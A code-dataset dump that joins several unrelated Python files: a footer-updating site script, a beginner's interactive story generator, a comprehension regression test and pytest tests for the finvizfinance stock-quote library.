<div class="inner">
<section>
<h2>Get in touch</h2>
<ul class="icons">
<li><a target="_blank" href="https://github.com/Sonalisinghal" class="icon brands style2 fa-github"><span class="label">GitHub</span></a></li>
</ul>
</section>
<ul class="copyright">
<li>Made by Sonali Singhal</li><li>Design: <a href="http://html5up.net">HTML5 UP - Phantom</a></li>
</ul>
</div>
</footer>''')
# Re-insert the footer into every page listed in pages.py; updatePage()
# reads the current page from the loop variable (module global).
for pageToChange in pagelist:
    updatePage()
#remove <tempfile> as we don't need it anymore
os.remove(tempfile)
| 26.255319 | 151 | 0.583468 |
de977a5433adac539e6b00b4ffb185c559d896ce | 549 | py | Python | PBLCoders/convert.py | Tyler929/tyler929.github.io-Tyler929 | f5f0451c55bc12a668b7ad880995c96bd4c0d5ed | [
"MIT"
] | null | null | null | PBLCoders/convert.py | Tyler929/tyler929.github.io-Tyler929 | f5f0451c55bc12a668b7ad880995c96bd4c0d5ed | [
"MIT"
] | null | null | null | PBLCoders/convert.py | Tyler929/tyler929.github.io-Tyler929 | f5f0451c55bc12a668b7ad880995c96bd4c0d5ed | [
"MIT"
] | null | null | null | # asks for name and gender
# asks for name and gender
def storyStart(name, gender):
    """Print the opening of the story with pronouns matching *gender*.

    name: the protagonist's name.
    gender: 'm' or 'f'; any other value falls back to gender-neutral
        they/their pronouns instead of crashing.
    """
    # Bug fix: the original never assigned `pronoun1` for 'f' (NameError
    # on the second print) and left both names unassigned for any other
    # input.
    if gender == 'm':
        pronoun, pronoun1 = 'He', 'his'
    elif gender == 'f':
        pronoun, pronoun1 = 'She', 'her'
    else:
        pronoun, pronoun1 = 'They', 'their'
    # prints variable arguments
    print('One stormy day, ' + name + ' was attempting to mine bitcoin.')
    print(pronoun + ' was desperate to mine, but couldn\'t, the malware overtook ' + pronoun1 + ' computer!' )
# Gather story inputs interactively, then print the opening.
userName = input('What is your name? ')
gender = input('Are you male or female (type m or f)? ')
# program
storyStart(userName, gender)
| 23.869565 | 110 | 0.617486 |
4fd52550bf8badb9bf85b5194aaacd10adf033a9 | 145 | py | Python | test/regression/features/comprehensions/singleton_comprehension.py | ppelleti/berp | 30925288376a6464695341445688be64ac6b2600 | [
"BSD-3-Clause"
] | 137 | 2015-02-13T21:03:23.000Z | 2021-11-24T03:53:55.000Z | test/regression/features/comprehensions/singleton_comprehension.py | ppelleti/berp | 30925288376a6464695341445688be64ac6b2600 | [
"BSD-3-Clause"
] | 4 | 2015-04-01T13:49:13.000Z | 2019-07-09T19:28:56.000Z | test/regression/features/comprehensions/singleton_comprehension.py | bjpop/berp | 30925288376a6464695341445688be64ac6b2600 | [
"BSD-3-Clause"
] | 8 | 2015-04-25T03:47:52.000Z | 2019-07-27T06:33:56.000Z | # list
# Regression script: each comprehension form applied to a singleton
# iterable (list, set, dict, and generator expression).
# list
print([x for x in [1]])
# set
print({x for x in [1]})
# dict
print({x:x for x in [1]})
# gen
for item in (x for x in [1]):
    print(item)
| 14.5 | 29 | 0.551724 |
d284e21bdfc81e1268e3608634db92854d9cdc1c | 1,553 | py | Python | test/test_quote.py | major/finvizfinance | f5998ce78f79baa8a63a78e831e950d48cc830c9 | [
"MIT"
] | 1 | 2022-02-12T05:56:29.000Z | 2022-02-12T05:56:29.000Z | test/test_quote.py | major/finvizfinance | f5998ce78f79baa8a63a78e831e950d48cc830c9 | [
"MIT"
] | null | null | null | test/test_quote.py | major/finvizfinance | f5998ce78f79baa8a63a78e831e950d48cc830c9 | [
"MIT"
] | null | null | null | import pytest
from finvizfinance.quote import finvizfinance, Quote, Statements
# def test_finvizfinance_quote(mocker):
# web_scrap_mock = mocker.patch('finvizfinance.quote.web_scrap', return_value={"text": 'web_scrap'})
# Quote().getCurrent('ticker')
# web_scrap_mock.assert_called_with('https://finviz.com/request_quote.ashx?t=ticker')
def test_finvizfinance_finvizfinance():
    """Smoke test: a full-info lookup for a real ticker returns data."""
    info = finvizfinance('tsla').ticker_full_info()
    assert info is not None
def test_finvizfinance_finvizfinance_chart_invalid(mocker):
    # Stub out the ticker-existence check and page fetch so no network
    # traffic occurs.
    mocker.patch('finvizfinance.quote.finvizfinance._checkexist', return_value=True)
    mocker.patch('finvizfinance.quote.web_scrap', return_value="")
    # An unknown timeframe must be rejected before any chart is requested.
    with pytest.raises(ValueError, match=r"Invalid timeframe 'dummy'"):
        finvizfinance('tsla').ticker_charts(timeframe='dummy')
def test_statements():
    # Live request: pulls real statement data for TSLA (no mocking).
    fstatments = Statements()
    df = fstatments.get_statements('tsla')
    assert (df is not None)
    # NOTE(review): this chart-type check looks misplaced -- unlike the
    # timeframe test above it runs without mocks, so it hits the network;
    # it probably belongs in test_finvizfinance_finvizfinance_chart_invalid.
    with pytest.raises(ValueError, match=r"Invalid chart type 'dummy'"):
        finvizfinance('tsla').ticker_charts(charttype='dummy')
def test_finvizfinance_finvizfinance_chart(mocker):
    # Stub the existence check and page fetch; capture the image download.
    mocker.patch('finvizfinance.quote.finvizfinance._checkexist', return_value=True)
    mocker.patch('finvizfinance.quote.web_scrap', return_value="")
    image_scrap_mock = mocker.patch('finvizfinance.quote.image_scrap')
    finvizfinance('dummy').ticker_charts()
    # Default chart URL: candle type (ty=c), TA enabled (ta=1), daily (p=d).
    image_scrap_mock.assert_called_with(
        'https://finviz.com/chart.ashx?t=dummy&ty=c&ta=1&p=d', 'dummy', '')
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.